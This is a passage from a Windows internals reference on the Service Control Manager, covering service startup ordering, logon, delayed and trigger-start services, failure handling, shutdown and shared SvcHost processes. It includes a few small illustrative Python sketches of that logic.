start drivers. To avoid confusion, you should assume that the term services means services and drivers
unless indicated otherwise. ScAutoStartServices begins by starting two important and basic services,
named Plug and Play (implemented in the Umpnpmgr.dll library) and Power (implemented in the
Umpo.dll library), which are needed by the system for managing plug-and-play hardware and power
interfaces. The SCM then registers its Autostart WNF state, used to indicate the current autostart phase
to the Power and other services.
Before the starting of other services can begin, the ScAutoStartServices routine calls ScGetBootAnd
SystemDriverState to scan the service database looking for boot-start and system-start device driver
entries. ScGetBootAndSystemDriverState determines whether a driver with the start type set to Boot
Start or System Start successfully started by looking up its name in the object manager namespace
directory named \Driver. When a device driver successfully loads, the I/O manager inserts the driver’s
object in the namespace under this directory, so if its name isn’t present, it hasn’t loaded. Figure 10-15
shows WinObj displaying the contents of the Driver directory. ScGetBootAndSystemDriverState
notes the names of drivers that haven’t started and that are part of the current profile in a list named
ScStoppedDrivers. The list will be used later at the end of the SCM initialization for logging an event to
the system event log (ID 7036), which contains the list of boot drivers that have failed to start.
FIGURE 10-15 List of driver objects.
The algorithm in ScAutoStartServices for starting services in the correct order proceeds in phases,
whereby a phase corresponds to a group and phases proceed in the sequence defined by the group
ordering stored in the HKLM\SYSTEM\CurrentControlSet\Control\ServiceGroupOrder\List registry
value. The List value, shown in Figure 10-16, includes the names of groups in the order that the SCM
should start them. Thus, assigning a service to a group has no effect other than to fine-tune its startup
with respect to other services belonging to different groups.
FIGURE 10-16 ServiceGroupOrder registry key.
When a phase starts, ScAutoStartServices marks all the service entries belonging to the phase’s
group for startup. Then ScAutoStartServices loops through the marked services to see whether it can
start each one. Part of this check includes seeing whether the service is marked as delayed autostart or
a user template service; in both cases, the SCM will start it at a later stage. (Delayed autostart services
must also be ungrouped. User services are discussed later in the “User services” section.) Another part
of the check it makes consists of determining whether the service has a dependency on another group,
as specified by the existence of the DependOnGroup value in the service’s registry key. If a dependency
exists, the group on which the service is dependent must have already initialized, and at least one
service of that group must have successfully started. If the service depends on a group that starts later
than the service’s group in the group startup sequence, the SCM notes a “circular dependency” error
for the service. If ScAutoStartServices is considering a Windows service or an autostart device driver,
it next checks to see whether the service depends on one or more other services; if it is dependent, it
determines whether those services have already started. Service dependencies are indicated with the
DependOnService registry value in a service’s registry key. If a service depends on other services that
belong to groups that come later in the ServiceGroupOrder\List, the SCM also generates a “circular
dependency” error and doesn’t start the service. If the service depends on any services from the same
group that haven’t yet started, the service is skipped.
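The per-group, multi-pass logic can be approximated in Python (a greatly simplified sketch; the function and variable names are invented for illustration, and real SCM behavior involves many more checks):

```python
# Simplified sketch of ScAutoStartServices' per-group loop: keep looping over
# the group's services, starting only those whose service dependencies within
# the same group are already satisfied. A dependency on a later group yields
# a "circular dependency" error, as described in the text.
def start_group(group_services, started, group_rank, this_rank):
    """group_services: name -> list of DependOnService names.
    group_rank: name -> rank of the group it belongs to."""
    errors = []
    progress = True
    while progress:                       # loop until no service can be started
        progress = False
        for name, deps in group_services.items():
            if name in started or name in errors:
                continue
            if any(group_rank.get(d, this_rank) > this_rank for d in deps):
                errors.append(name)       # depends on a later group: error
                continue
            if all(d in started for d in deps):
                started.add(name)         # "start" the service
                progress = True
    return errors

started = set()
errors = start_group(
    {"A": [], "B": ["A"], "C": ["LaterSvc"]},
    started,
    {"A": 0, "B": 0, "C": 0, "LaterSvc": 1},
    0,
)
print(sorted(started), errors)            # -> ['A', 'B'] ['C']
```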
When the dependencies of a service have been satisfied, ScAutoStartServices makes a final check
to see whether the service is part of the current boot configuration before starting the service. When
the system is booted in safe mode, the SCM ensures that the service is either identified by name or by
group in the appropriate safe boot registry key. There are two safe boot keys, Minimal and Network,
under HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot, and the one that the SCM checks depends
on what safe mode the user booted. If the user chose Safe Mode or Safe Mode With Command Prompt
at the modern or legacy boot menu, the SCM references the Minimal key; if the user chose Safe Mode
With Networking, the SCM refers to Network. The existence of a string value named Option under the
SafeBoot key indicates not only that the system booted in safe mode but also the type of safe mode the
user selected. For more information about safe boots, see the section “Safe mode” in Chapter 12.
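A minimal sketch of that eligibility check, assuming the relevant registry contents have already been read into Python dictionaries (names are illustrative):

```python
# Simplified sketch of the safe-boot eligibility check: in safe mode, a
# service starts only if its name or its group appears under the SafeBoot
# subkey (Minimal or Network) selected by the boot option.
def starts_in_safe_mode(service, group, safeboot_option, safeboot_keys):
    if safeboot_option is None:      # normal boot: no restriction
        return True
    key = "Network" if safeboot_option == "Network" else "Minimal"
    allowed = safeboot_keys[key]
    return service in allowed or (group is not None and group in allowed)

keys = {"Minimal": {"RpcSs", "Base"},
        "Network": {"RpcSs", "Base", "NetworkProvider"}}
print(starts_in_safe_mode("Dhcp", "NetworkProvider", "Network", keys))  # -> True
print(starts_in_safe_mode("Dhcp", "NetworkProvider", "Minimal", keys))  # -> False
```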
Service start
Once the SCM decides to start a service, it calls StartInternal, which takes different steps for services
than for device drivers. When StartInternal starts a Windows service, it first determines the name of
the file that runs the service’s process by reading the ImagePath value from the service’s registry key.
If the service file corresponds to LSASS.exe, the SCM initializes a control pipe, connects to the already-
running LSASS process, and waits for the LSASS process response. When the pipe is ready, the LSASS
process connects to the SCM by calling the classical StartServiceCtrlDispatcher routine. As shown in
Figure 10-17, some services like Credential Manager or Encrypting File System need to cooperate with
the Local Security Authority Subsystem Service (LSASS), usually for performing cryptography operations
for the local system policies (like passwords, privileges, and security auditing; see Chapter 7 of Part 1
for more details).
FIGURE 10-17 Services hosted by the Local Security Authority Subsystem Service (LSASS) process.
The SCM then determines whether the service is critical (by analyzing the FailureAction registry value)
or is running under WoW64. (If the service is a 32-bit service, the SCM should apply file system redirec-
tion. See the “WoW64” section of Chapter 8 for more details.) It also examines the service’s Type value. If
the following conditions apply, the SCM initiates a search in the internal Image Record Database:
- The service type value includes SERVICE_WINDOWS_SHARE_PROCESS (0x20).
- The service has not been restarted after an error.
- Svchost service splitting is not allowed for the service (see the “Svchost service splitting” section later in this chapter for further details).
An Image record is a data structure that represents a launched process hosting at least one service.
If the preceding conditions apply, the SCM searches for an image record that has the same process
executable’s name as the new service’s ImagePath value.
If the SCM locates an existing image database entry with matching ImagePath data, the service can
be shared, and one of the hosting processes is already running. The SCM ensures that the found host-
ing process is logged on using the same account as the one specified for the service being started. (This
is to ensure that the service is not configured with the wrong account, such as a LocalService account,
but with an image path pointing to a running Svchost, such as netsvcs, which runs as LocalSystem.) A
service’s ObjectName registry value stores the user account in which the service should run. A service
with no ObjectName or an ObjectName of LocalSystem runs in the local system account. A process can
be logged on as only one account, so the SCM reports an error when a service specifies a different ac-
count name than another service that has already started in the same process.
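The sharing check can be sketched as follows (hypothetical Python, not the SCM implementation; the record layout and function name are invented):

```python
# Hypothetical sketch of the shared-process check: reuse an existing hosting
# process only if one exists for the same ImagePath AND it is logged on with
# the account the new service is configured for (ObjectName, defaulting to
# LocalSystem when absent), as described in the text.
def find_shared_host(image_records, image_path, object_name):
    account = object_name or "LocalSystem"
    for record in image_records:
        if record["ImagePath"].lower() == image_path.lower():
            if record["Account"] != account:
                # mirrors the SCM reporting an account-mismatch error
                raise ValueError("account mismatch for shared hosting process")
            return record
    return None                      # no image record: a new host is needed

records = [{"ImagePath": r"C:\Windows\System32\svchost.exe -k netsvcs",
            "Account": "LocalSystem"}]
host = find_shared_host(records,
                        r"c:\windows\system32\svchost.exe -k netsvcs", None)
print(host is not None)              # -> True
```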
If the image record exists, before the new service can be run, another final check should be per-
formed: The SCM opens the token of the currently executing host process and checks whether the nec-
essary service SID is located in the token (and all the required privileges are enabled). Even in this case,
the SCM reports an error if the check fails. Note that, as we describe in the next section
(“Service logon”), for shared services, all the SIDs of the hosted services are added at token creation
time. It is not possible for any user-mode component to add group SIDs in a token after the token has
already been created.
If the image database doesn’t have an entry for the new service ImagePath value, the SCM creates
one. When the SCM creates a new entry, it stores the logon account name used for the service and
the data from the service’s ImagePath value. The SCM requires services to have an ImagePath value.
If a service doesn’t have an ImagePath value, the SCM reports an error stating that it couldn’t find the
service’s path and isn’t able to start the service. After the SCM creates an image record, it logs on the
service account and starts the new hosting process. (The procedure is described in the next section,
“Service logon.”)
After the service has been logged on and the host process correctly started, the SCM waits for the
initial “connection” message from the service. The service connects to the SCM through the SCM RPC pipe
(\Pipe\Ntsvcs, as described in the “The Service Control Manager” section) and to a Channel Context
data structure built by the LogonAndStartImage routine. When the SCM receives the first message, it
proceeds to start the service by posting a SERVICE_CONTROL_START control message to the service
process. Note that in the described communication protocol, it is always the service that connects to the SCM.
The service application is able to process the message thanks to the message loop located in the
StartServiceCtrlDispatcher API (see the “Service applications” section earlier in this chapter for more de-
tails). The service application enables the service group SID in its token (if needed) and creates the new
service thread (which will execute the Service Main function). It then calls back into the SCM to create
a handle to the new service, storing it in an internal data structure (INTERNAL_DISPATCH_TABLE)
similar to the service table specified as input to the StartServiceCtrlDispatcher API. The data structure is
used for tracking the active services in the hosting process. If the service fails to respond positively to
the start command within the timeout period, the SCM gives up and notes an error in the system Event
Log that indicates the service failed to start in a timely manner.
If the service the SCM starts with a call to StartInternal has a Type registry value of SERVICE_KERNEL_
DRIVER or SERVICE_FILE_SYSTEM_DRIVER, the service is really a device driver, so StartInternal enables
the load driver security privilege for the SCM process and then invokes the kernel service NtLoadDriver,
passing in the data in the ImagePath value of the driver’s registry key. Unlike services, drivers don’t
need to specify an ImagePath value, and if the value is absent, the SCM builds an image path by ap-
pending the driver’s name to the string %SystemRoot%\System32\Drivers\.
Note A device driver with the start value of SERVICE_AUTO_START or SERVICE_DEMAND_
START is started by the SCM as a runtime driver, which implies that the resulting loaded
image uses shared pages and has a control area that describes them. This is different than
drivers with the start value of SERVICE_BOOT_START or SERVICE_SYSTEM_START, which are
loaded by the Windows Loader and started by the I/O manager. Those drivers all use private
pages and are not sharable, nor do they have an associated control area.
More details are available in Chapter 5 in Part 1.
ScAutoStartServices continues looping through the services belonging to a group until all the
services have either started or generated dependency errors. This looping is the SCM’s way of auto-
matically ordering services within a group according to their DependOnService dependencies. The SCM
starts the services that other services depend on in earlier loops, skipping the dependent services until
subsequent loops. Note that the SCM ignores Tag values for Windows services, which you might come
across in subkeys under the HKLM\SYSTEM\CurrentControlSet\Services key; the I/O manager honors
Tag values to order device driver startup within a group for boot-start and system-start drivers. Once
the SCM completes phases for all the groups listed in the ServiceGroupOrder\List value, it performs
a phase for services belonging to groups not listed in the value and then executes a final phase for
services without a group.
After handling autostart services, the SCM calls ScInitDelayStart, which queues a delayed work item
associated with a worker thread responsible for processing all the services that ScAutoStartServices
skipped because they were marked delayed autostart (through the DelayedAutostart registry value).
This worker thread will execute after the delay. The default delay is 120 seconds, but it can be
overridden by creating an AutoStartDelay value in HKLM\SYSTEM\CurrentControlSet\Control. The SCM
performs the same actions as those executed during startup of nondelayed autostart services.
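In sketch form (illustrative Python; the registry value and default are as described above, but the function is invented):

```python
# Small sketch of the delayed-autostart delay selection: default 120 seconds
# unless an AutoStartDelay value exists under
# HKLM\SYSTEM\CurrentControlSet\Control.
DEFAULT_AUTOSTART_DELAY = 120  # seconds

def autostart_delay(control_key_values: dict) -> int:
    return control_key_values.get("AutoStartDelay", DEFAULT_AUTOSTART_DELAY)

print(autostart_delay({}))                       # -> 120
print(autostart_delay({"AutoStartDelay": 300}))  # -> 300
```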
When the SCM finishes starting all autostart services and drivers, as well as setting up the delayed
autostart work item, the SCM signals the event \BaseNamedObjects\SC_AutoStartComplete. This event
is used by the Windows Setup program to gauge startup progress during installation.
Service logon
During the start procedure, if the SCM does not find any existing image record, it means that the host
process needs to be created: either the new service is not shareable, it’s the first one to be executed,
it has been restarted, or it’s a user service. Before starting the process, the SCM must create an access
token for the service host process. The LogonAndStartImage function’s goal is to create the token and
start the service’s host process. The procedure depends on the type of service that will be started.
User services (more precisely user service instances) are started by retrieving the current
logged-on user token (through functions implemented in the UserMgr.dll library). In this case, the
LogonAndStartImage function duplicates the user token and adds the “WIN://ScmUserService” security
attribute (the attribute value is usually set to 0). This security attribute is used primarily by the Service
Control Manager when receiving connection requests from the service. Although SCM can recognize
a process that’s hosting a classical service through the service SID (or the System account SID if the
service is running under the Local System Account), it uses the SCM security attribute for identifying a
process that’s hosting a user service.
For all other types of services, the SCM reads the account under which the service will be started
from the registry (from the ObjectName value) and calls ScCreateServiceSids with the goal to create a
service SID for each service that will be hosted by the new process. (The SCM cycles between each ser-
vice in its internal service database.) Note that if the service runs under the LocalSystem account (with
neither a restricted nor an unrestricted SID), this step is not executed.
The SCM logs on services that don’t run in the System account by calling the LSASS function
LogonUserExEx. LogonUserExEx normally requires a password, but the SCM indicates to LSASS
that the password is stored as a service’s LSASS “secret” under the key HKLM\SECURITY\Policy\Secrets
in the registry. (Keep in mind that the contents of SECURITY aren’t typically visible because its default
security settings permit access only from the System account.) When the SCM calls LogonUserExEx, it
specifies a service logon as the logon type, so LSASS looks up the password in the Secrets subkey that
has a name in the form _SC_<Service Name>.
Note Services running with a virtual service account do not need a password to have
their service token created by the LSA service. For those services, the SCM does not provide
any password to the LogonUserExEx API.
The SCM directs LSASS to store a logon password as a secret using the LsaStorePrivateData function
when an SCP configures a service’s logon information. When a logon is successful, LogonUserExEx returns
a handle to an access token to the caller. The SCM adds the necessary service SIDs to the returned
token, and, if the new service uses restricted SIDs, invokes the ScMakeServiceTokenWriteRestricted
function, which transforms the token into a write-restricted token (adding the proper restricted SIDs).
Windows uses access tokens to represent a user’s security context, and the SCM later associates the
access token with the process that implements the service.
Next, the SCM creates the user environment block and security descriptor to associate with the
new service process. In case the service that will be started is a packaged service, the SCM reads all the
package information from the registry (package full name, origin, and application user model ID) and
calls the Appinfo service, which stamps the token with the necessary AppModel security attributes and
prepares the service process for the modern package activation. (See the “Packaged applications” sec-
tion in Chapter 8 for more details about the AppModel.)
After a successful logon, the SCM loads the account’s profile information, if it’s not already loaded,
by calling the User Profile Basic Api DLL’s (%SystemRoot%\System32\Profapi.dll) LoadProfileBasic
function. The value HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\<user profile
key>\ProfileImagePath contains the location on disk of a registry hive that LoadUserProfile loads into
the registry, making the information in the hive the HKEY_CURRENT_USER key for the service.
As its next step, LogonAndStartImage proceeds to launch the service’s process. The SCM starts the
process in a suspended state with the CreateProcessAsUser Windows function. (The exception is a process
hosting services under the Local System account, which is created through the standard CreateProcess
API; the SCM already runs with a SYSTEM token, so no other logon is needed.)
Before the process is resumed, the SCM creates the communication data structure that allows the
service application and the SCM to communicate through asynchronous RPCs. The data structure con-
tains a control sequence, a pointer to a control and response buffer, service and hosting process data
(like the PID, the service SID, and so on), a synchronization event, and a pointer to the async RPC state.
The SCM resumes the service process via the ResumeThread function and waits for the ser-
vice to connect to its SCM pipe. If it exists, the registry value HKLM\SYSTEM\CurrentControlSet\
Control\ServicesPipeTimeout determines the length of time that the SCM waits for a service to call
StartServiceCtrlDispatcher and connect before it gives up, terminates the process, and concludes
that the service failed to start (note that in this case the SCM terminates the process, unlike when the
service doesn’t respond to the start request, discussed previously in the “Service start” section). If
ServicesPipeTimeout doesn’t exist, the SCM uses a default timeout of 30 seconds. The SCM uses the
same timeout value for all its service communications.
Delayed autostart services
Delayed autostart services enable Windows to cope with the growing number of services that are
being started when a user logs on, which bogs down the boot-up process and increases the time
before a user is able to get responsiveness from the desktop. The design of autostart services was
primarily intended for services required early in the boot process because other services depend on
them, a good example being the RPC service, on which all other services depend. The other use was to
allow unattended startup of a service, such as the Windows Update service. Because many autostart
services fall in this second category, marking them as delayed autostart allows critical services to start
faster and for the user’s desktop to be ready sooner when a user logs on immediately after booting.
Additionally, these services run in background mode, which lowers their thread, I/O, and memory
priority. Configuring a service for delayed autostart requires calling the ChangeServiceConfig2 API. You
can check the state of the flag for a service by using the qc option of sc.exe.
Note If a nondelayed autostart service has a delayed autostart service as one of its
dependencies, the delayed autostart flag is ignored and the service is started immediately
to satisfy the dependency.
Triggered-start services
Some services need to be started on demand, after certain system events occur. For that reason,
Windows 7 introduced the concept of triggered-start services. A service control program can use the
ChangeServiceConfig2 API (by specifying the SERVICE_CONFIG_TRIGGER_INFO information level) for
configuring a demand-start service to be started (or stopped) after one or more system events occur.
Examples of system events include the following:
■   A specific device interface is connected to the system.
■   The computer joins or leaves a domain.
■   A TCP/IP port is opened or closed in the system firewall.
■   A machine or user policy has been changed.
■   An IP address on the network TCP/IP stack becomes available or unavailable.
■   An RPC request or named pipe packet arrives on a particular interface.
■   An ETW event has been generated in the system.
The first implementation of triggered-start services relied on the Unified Background Process
Manager (see the next section for details). Windows 8.1 introduced the Broker Infrastructure, which had
the main goal of managing multiple system events targeted to Modern apps. All the previously listed
events have thus come to be managed mainly by three components: the Desktop Activity Broker and
the System Events Broker, which are part of the Broker Infrastructure, and the Event Aggregation,
which is not. More information on the Broker Infrastructure is available in the
“Packaged applications” section of Chapter 8.
After the first phase of ScAutoStartServices is complete (which usually starts critical services listed
in the HKLM\SYSTEM\CurrentControlSet\Control\EarlyStartServices registry value), the SCM calls
ScRegisterServicesForTriggerAction, the function responsible for registering the triggers for each
triggered-start service. The routine cycles between each Win32 service located in the SCM database. For
each service, the function generates a temporary WNF state name (using the NtCreateWnfStateName
native API), protected by a proper security descriptor, and publishes it with the service status stored as
state data. (WNF architecture is described in the “Windows Notification Facility” section of Chapter 8.)
This WNF state name is used for publishing services status changes. The routine then queries all the
service triggers from the TriggerInfo registry key, checking their validity and bailing out in case no trig-
gers are available.
Note The list of supported triggers, described previously, together with their parameters,
is documented at https://docs.microsoft.com/en-us/windows/win32/api/winsvc/ns-winsvc-
service_trigger.
If the check succeeds, for each trigger the SCM builds an internal data structure containing all the
trigger information (like the targeted service name, SID, broker name, and trigger parameters) and
determines the correct broker based on the trigger type: external devices events are managed by the
System Events broker, while all the other types of events are managed by the Desktop Activity broker.
The SCM at this stage is able to call the proper broker registration routine. The registration process is
private and depends on the broker: multiple private WNF state names (which are broker specific) are
generated for each trigger and condition.
The Event Aggregation broker is the glue between the private WNF state names published by the
two brokers and the Service Control Manager. It subscribes to all the WNF state names corresponding
to the triggers and the conditions (by using the RtlSubscribeWnfStateChangeNotification API). When
enough WNF state names have been signaled, the Event Aggregation calls back the SCM, which can
start or stop the triggered start service.
Unlike the WNF state names used for each trigger, the SCM always independently publishes
a WNF state name for each Win32 service whether or not the service has registered some triggers. This
is because an SCP can receive notification when the specified service status changes by invoking the
NotifyServiceStatusChange API, which subscribes to the service’s status WNF state name. Every time the
SCM raises an event that changes the status of a service, it publishes new state data to the “service status
change” WNF state, which wakes up a thread running the status change callback function in the SCP.
Startup errors
If a driver or a service reports an error in response to the SCM’s startup command, the ErrorControl
value of the service’s registry key determines how the SCM reacts. If the ErrorControl value is SERVICE_
ERROR_IGNORE (0) or the ErrorControl value isn’t specified, the SCM simply ignores the error and
continues processing service startups. If the ErrorControl value is SERVICE_ERROR_NORMAL (1), the
SCM writes an event to the system Event Log that says, “The <service name> service failed to start due
to the following error.” The SCM includes the textual representation of the Windows error code that the
service returned to the SCM as the reason for the startup failure in the Event Log record. Figure 10-18
shows the Event Log entry that reports a service startup error.
FIGURE 10-18 Service startup failure Event Log entry.
If a service with an ErrorControl value of SERVICE_ERROR_SEVERE (2) or SERVICE_ERROR_CRITICAL
(3) reports a startup error, the SCM logs a record to the Event Log and then calls the internal function
ScRevertToLastKnownGood. This function checks whether the last known good feature is enabled, and,
if so, switches the system’s registry configuration to a version, named last known good, with which the
system last booted successfully. Then it restarts the system using the NtShutdownSystem system ser-
vice, which is implemented in the executive. If the system is already booting with the last known good
configuration, or if the last known good configuration is not enabled, the SCM does nothing more than
emit a log event.
Accepting the boot and last known good
Besides starting services, the system charges the SCM with determining when the system’s registry
configuration, HKLM\SYSTEM\CurrentControlSet, should be saved as the last known good control
set. The CurrentControlSet key contains the Services key as a subkey, so CurrentControlSet includes the
registry representation of the SCM database. It also contains the Control key, which stores many kernel-
mode and user-mode subsystem configuration settings. By default, a successful boot consists of a suc-
cessful startup of autostart services and a successful user logon. A boot fails if the system halts because
a device driver crashes the system during the boot or if an autostart service with an ErrorControl value
of SERVICE_ERROR_SEVERE or SERVICE_ERROR_CRITICAL reports a startup error.
The last known good configuration feature is usually disabled in the client version of Windows.
It can be enabled by setting the HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\
Configuration Manager\LastKnownGood\Enabled registry value to 1. In Server SKUs of Windows, the
value is enabled by default.
The SCM knows when it has completed a successful startup of the autostart services, but Winlogon
(%SystemRoot%\System32\Winlogon.exe) must notify it when there is a successful logon. Winlogon
invokes the NotifyBootConfigStatus function when a user logs on, and NotifyBootConfigStatus sends a
message to the SCM. Following the successful start of the autostart services or the receipt of the mes-
sage from NotifyBootConfigStatus (whichever comes last), if the last known good feature is enabled, the
SCM calls the system function NtInitializeRegistry to save the current registry startup configuration.
Third-party software developers can supersede Winlogon’s definition of a successful logon
with their own definition. For example, a system running Microsoft SQL Server might not consider
a boot successful until after SQL Server is able to accept and process transactions. Developers im-
pose their definition of a successful boot by writing a boot-verification program and installing the
program by pointing to its location on disk with the value stored in the registry key HKLM\SYSTEM\
CurrentControlSet\Control\BootVerificationProgram. In addition, a boot-verification program’s instal-
lation must disable Winlogon’s call to NotifyBootConfigStatus by setting HKLM\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon\ReportBootOk to 0. When a boot-verification program is
installed, the SCM launches it after finishing autostart services and waits for the program’s call to
NotifyBootConfigStatus before saving the last known good control set.
Windows maintains several copies of CurrentControlSet, and CurrentControlSet is really a symbolic
registry link that points to one of the copies. The control sets have names in the form HKLM\SYSTEM\
ControlSetnnn, where nnn is a number such as 001 or 002. The HKLM\SYSTEM\Select key contains values
that identify the role of each control set. For example, if CurrentControlSet points to ControlSet001, the
Current value under Select has a value of 1. The LastKnownGood value under Select contains the number
of the last known good control set, which is the control set last used to boot successfully. Another value
that might be on your system under the Select key is Failed, which points to the last control set for which
the boot was deemed unsuccessful and aborted in favor of an attempt at booting with the last known
good control set. Figure 10-19 displays a Windows Server system’s control sets and Select values.
NtInitializeRegistry takes the contents of the last known good control set and synchronizes it with
that of the CurrentControlSet key’s tree. If this was the system’s first successful boot, the last known
good won’t exist, and the system will create a new control set for it. If the last known good tree exists,
the system simply updates it with differences between it and CurrentControlSet.
FIGURE 10-19 Control set selection key on Windows Server 2019.
Last known good is helpful in situations in which a change to CurrentControlSet, such as the modifi-
cation of a system performance-tuning value under HKLM\SYSTEM\Control or the addition of a service
or device driver, causes the subsequent boot to fail. Figure 10-20 shows the Startup Settings of the
modern boot menu. Indeed, when the Last Known Good feature is enabled, and the system is in the
boot process, users can select the Startup Settings choice in the Troubleshoot section of the modern
boot menu (or in the Windows Recovery Environment) to bring up another menu that lets them direct
the boot to use the last known good control set. (In case the system is still using the Legacy boot
menu, users should press F8 to enable the Advanced Boot Options.) As shown in the figure, when the
Enable Last Known Good Configuration option is selected, the system boots by rolling the system’s
registry configuration back to the way it was the last time the system booted successfully. Chapter 12
describes in more detail the use of the Modern boot menu, the Windows Recovery Environment, and
other recovery mechanisms for troubleshooting system startup problems.
FIGURE 10-20 Enabling the last known good configuration.
Service failures
A service can have optional FailureActions and FailureCommand values in its registry key that the SCM
records during the service’s startup. The SCM registers with the system so that the system signals the
SCM when a service process exits. When a service process terminates unexpectedly, the SCM deter-
mines which services ran in the process and takes the recovery steps specified by their failure-related
registry values. Additionally, services are not limited to requesting failure actions during crashes
or unexpected service termination, since other problems, such as a memory leak, could also result in
service failure.
If a service enters the SERVICE_STOPPED state and the error code returned to the SCM is not
ERROR_SUCCESS, the SCM checks whether the service has the FailureActionsOnNonCrashFailures flag
set and performs the same recovery as if the service had crashed. To use this functionality, the service
must be configured via the ChangeServiceConfig2 API or the system administrator can use the Sc.exe
utility with the Failureflag parameter to set FailureActionsOnNonCrashFailures to 1. Because the
default value is 0, the SCM continues to honor the same behavior as on earlier versions of Windows for
all other services.
Actions that a service can configure for the SCM include restarting the service, running a program,
and rebooting the computer. Furthermore, a service can specify the failure actions that take place the
first time the service process fails, the second time, and subsequent times, and it can indicate a delay
period that the SCM waits before restarting the service if the service asks to be restarted. You can easily
manage the recovery actions for a service using the Recovery tab of the service’s Properties dialog
box in the Services MMC snap-in, as shown in Figure 10-21.
FIGURE 10-21 Service Recovery options.
Note that if the next failure action is to reboot the computer, the SCM, after starting the ser-
vice, marks the hosting process as critical by invoking the NtSetInformationProcess native API with the
ProcessBreakOnTermination information class. A critical process, if terminated unexpectedly, crashes
the system with the CRITICAL_PROCESS_DIED bugcheck (as already explained in Part 1, Chapter 2,
“System architecture”).
Service shutdown
When Winlogon calls the Windows ExitWindowsEx function, ExitWindowsEx sends a message to
Csrss, the Windows subsystem process, to invoke Csrss’s shutdown routine. Csrss loops through the
active processes and notifies them that the system is shutting down. For every system process except
the SCM, Csrss waits up to the time specified in milliseconds by HKCU\Control Panel\
Desktop\WaitToKillTimeout (which defaults to 5 seconds) for the process to exit before moving on to the
next process. When Csrss encounters the SCM process, it also notifies it that the system is shutting down
but employs a timeout specific to the SCM. Csrss recognizes the SCM using the process ID Csrss saved
when the SCM registered with Csrss using the RegisterServicesProcess function during its initialization.
The SCM’s timeout differs from that of other processes because Csrss knows that the SCM communi-
cates with services that need to perform cleanup when they shut down, so an administrator might need
to tune only the SCM’s timeout. The SCM’s timeout value in milliseconds resides in the HKLM\SYSTEM\
CurrentControlSet\Control\WaitToKillServiceTimeout registry value, and it defaults to 20 seconds.
The SCM’s shutdown handler is responsible for sending shutdown notifications to all the ser-
vices that requested shutdown notification when they initialized with the SCM. The SCM function
ScShutdownAllServices first queries the value of the HKLM\SYSTEM\CurrentControlSet\Control\
ShutdownTimeout (applying a default of 20 seconds in case the value does not exist). It then loops
through the SCM services database. For each service, it unregisters any registered service triggers and deter-
mines whether the service desires to receive a shutdown notification, sending a shutdown command
(SERVICE_CONTROL_SHUTDOWN) if that is the case. Note that all the notifications are sent to services
in parallel by using thread pool work threads. For each service to which it sends a shutdown command,
the SCM records the value of the service’s wait hint, a value that a service also specifies when it registers
with the SCM. The SCM keeps track of the largest wait hint it receives (if the largest wait hint is below the
shutdown timeout specified by the ShutdownTimeout registry value, the shutdown timeout is used as the
maximum wait hint). After sending the shutdown messages, the SCM waits either
until all the services it notified of shutdown exit or until the time specified by the largest wait hint passes.
While the SCM is busy telling services to shut down and waiting for them to exit, Csrss waits
for the SCM to exit. If the wait hint expires without all services exiting, the SCM exits, and Csrss
continues the shutdown process. If Csrss’s wait ends without the SCM having exited (the
WaitToKillServiceTimeout time expired), Csrss kills the SCM and continues the shutdown process. Thus,
services that fail to shut down in a timely manner are killed. This logic lets the system shut down in
the presence of services that never complete a shutdown as a result of flawed design, but it also means
that services that require more than 5 seconds will not complete their shutdown operations.
Additionally, because the shutdown order is not deterministic, services that might depend on other
services to shut down first (called shutdown dependencies) have no way to report this to the SCM and
might never have the chance to clean up either.
To address these needs, Windows implements preshutdown notifications and shutdown ordering
to combat the problems caused by these two scenarios. A preshutdown notification is sent to a service
that has requested it via the SetServiceStatus API (through the SERVICE_ACCEPT_PRESHUTDOWN ac-
cepted control) using the same mechanism as shutdown notifications. Preshutdown notifications are
sent before Wininit exits. The SCM generally waits for them to be acknowledged.
The idea behind these notifications is to flag services that might take a long time to clean up (such as
database server services) and give them more time to complete their work. The SCM sends a progress
query request and waits 10 seconds for a service to respond to this notification. If the service does not
respond within this time, it is killed during the shutdown procedure; otherwise, it can keep running for
as long as it needs, provided that it continues to respond to the SCM.
Services that participate in the preshutdown can also specify a shutdown order with respect to
other preshutdown services. Services that depend on other services to shut down first (for example,
the Group Policy service needs to wait for Windows Update to finish) can specify their shutdown de-
pendencies in the HKLM\SYSTEM\CurrentControlSet\Control\PreshutdownOrder registry value.
Shared service processes
Running every service in its own process instead of having services share a process whenever possible
wastes system resources. However, sharing processes means that if any of the services in the process
has a bug that causes the process to exit, all the services in that process terminate.
Of the Windows built-in services, some run in their own process and some share a process with
other services. For example, the LSASS process contains security-related services—such as the Security
Accounts Manager (SamSs) service, the Net Logon (Netlogon) service, the Encrypting File System (EFS)
service, and the Crypto Next Generation (CNG) Key Isolation (KeyIso) service.
There is also a generic process named Service Host (SvcHost - %SystemRoot%\System32\Svchost.
exe) to contain multiple services. Multiple instances of SvcHost run as different processes. Services
that run in SvcHost processes include Telephony (TapiSrv), Remote Procedure Call (RpcSs), and Remote
Access Connection Manager (RasMan). Windows implements services that run in SvcHost as DLLs and
includes an ImagePath definition of the form %SystemRoot%\System32\svchost.exe –k netsvcs in the
service’s registry key. The service’s registry key must also have a registry value named ServiceDll under
a Parameters subkey that points to the service’s DLL file.
All services that share a common SvcHost process specify the same parameter (–k netsvcs in the ex-
ample in the preceding paragraph) so that they have a single entry in the SCM’s image database. When
the SCM encounters the first service that has a SvcHost ImagePath with a particular parameter during
service startup, it creates a new image database entry and launches a SvcHost process with the param-
eter. The parameter specified with the -k switch is the name of the service group. The entire command
line is parsed by the SCM while creating the new shared hosting process. As discussed in the “Service
logon” section, in case another service in the database shares the same ImagePath value, its service SID
will be added to the new hosting process’s group SIDs list.
The new SvcHost process takes the service group specified in the command line and looks for a val-
ue having the same name under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost.
SvcHost reads the contents of the value, interpreting it as a list of service names, and notifies the SCM
that it’s hosting those services when SvcHost registers with the SCM.
When the SCM encounters another shared service (by checking the service type value) during
service startup with an ImagePath matching an entry it already has in the image database, it doesn’t
launch a second process but instead just sends a start command for the service to the SvcHost it
already started for that ImagePath value. The existing SvcHost process reads the ServiceDll parameter
in the service’s registry key, enables the new service group SID in its token, and loads the DLL into its
process to start the service.
Table 10-12 lists all the default service groupings on Windows and some of the services that are
registered for each of them.
TABLE 10-12 Major service groupings

Service Group: LocalService
